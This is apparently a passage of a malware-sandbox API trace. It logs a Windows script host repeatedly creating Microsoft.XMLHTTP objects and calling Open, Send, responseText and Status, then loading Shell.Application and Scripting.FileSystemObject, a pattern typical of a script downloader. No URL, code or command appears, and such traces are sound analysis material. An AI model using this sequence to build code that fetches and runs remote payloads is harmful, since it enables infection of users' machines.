	[0235.428] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0235.428] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0235.428] ??2@YAPEAX_K@Z () returned 0x62f310
	[0235.428] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0235.428] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.428] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0235.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0235.428] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0235.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.428] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.428] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0235.428] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0235.721] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0235.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0235.721] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0235.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0235.721] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0235.721] SysStringLen (param_1=0x0) returned 0x0
	[0235.721] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0235.721] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0235.721] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0235.722] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0235.722] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0235.722] ??2@YAPEAX_K@Z () returned 0x62f350
	[0235.722] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0235.722] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0235.722] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0235.722] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0235.722] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0235.722] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0235.722] SysStringLen (param_1=0x0) returned 0x0
	[0235.722] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0235.724] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0235.724] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0235.724] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0235.725] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0235.725] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0235.725] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0235.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0235.839] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0235.839] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0235.840] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.840] SysStringLen (param_1=0x0) returned 0x0
	[0235.841] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.841] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0235.841] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74d8) returned 0x0
	[0235.841] ??2@YAPEAX_K@Z () returned 0x62f310
	[0235.841] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74d8, pUnkSite=0x62f310) 
	[0235.841] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.841] XMLHTTPRequest:IUnknown:Release (This=0x49c74d8) returned 0x0
	[0235.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0235.841] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0235.841] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.841] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.843] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.843] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.843] SysStringLen (param_1=0x0) returned 0x0
	[0235.843] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.843] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.844] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0235.844] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.844] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0235.844] ??2@YAPEAX_K@Z () returned 0x62f330
	[0235.844] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f330) 
	[0235.844] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.844] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0235.844] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0235.844] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0235.844] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.844] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.844] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.844] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.844] SysStringLen (param_1=0x0) returned 0x0
	[0235.844] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.845] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.845] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0235.845] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.845] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74d8) returned 0x0
	[0235.845] ??2@YAPEAX_K@Z () returned 0x62f310
	[0235.845] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74d8, pUnkSite=0x62f310) 
	[0235.845] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.845] XMLHTTPRequest:IUnknown:Release (This=0x49c74d8) returned 0x0
	[0235.845] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0235.845] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0235.845] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.845] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.845] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.845] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.845] SysStringLen (param_1=0x0) returned 0x0
	[0235.845] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.846] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
